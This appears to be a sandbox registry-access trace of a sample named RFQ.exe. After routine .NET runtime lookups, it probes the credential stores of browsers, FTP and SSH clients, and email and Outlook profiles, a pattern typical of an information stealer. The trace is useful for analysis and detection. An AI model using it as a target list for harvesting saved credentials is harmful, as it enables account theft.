HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f32fe6d\23452f79
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2541b84\7aded61e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|RFQ.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|RFQ.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|RFQ.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2541b84\38c1215b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
